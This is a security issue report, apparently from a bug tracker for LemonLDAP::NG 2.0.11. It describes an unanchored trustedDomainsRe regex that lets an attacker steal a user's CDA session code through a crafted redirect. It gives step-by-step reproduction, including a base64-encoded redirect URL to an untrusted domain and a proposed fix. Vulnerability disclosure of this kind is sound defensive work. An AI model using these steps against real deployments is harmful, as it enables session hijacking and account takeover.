[security:low] Incorrect regexp construction in isTrustedUrl lets attacker steal session on CDA application
Concerned version
Version: 2.0.11
Summary
- Configure a CDA vhost (cda.example.com)
- let attack_urldc = base64(http://your-untrusted-domain.com/?attack=http://cda.example.com)
- Trick your target into opening http://auth.lemontest.lxd/?url=attack_url
- User is redirected to http://your-untrusted-domain.com/?attack=http://cda.example.com&lemonldapcda=CDA_CODE
- You may now login to http://cda.example.com?lemonldapcda=CDA_CODE as the target user
Example: http://auth.example.com/?url=aHR0cDovL3BlcmR1LmNvbS8/ZmFrZT1odHRwOi8vY2RhLmV4YW1wbGUuY29tLw==
Possible fixes
the trustedDomainsRe is missing a ^
, this is also the case in !185 (merged)
This mistake causes trustedDomainsRe to be easily bypassed, but CDA is the feature which has the worst impact for this mistake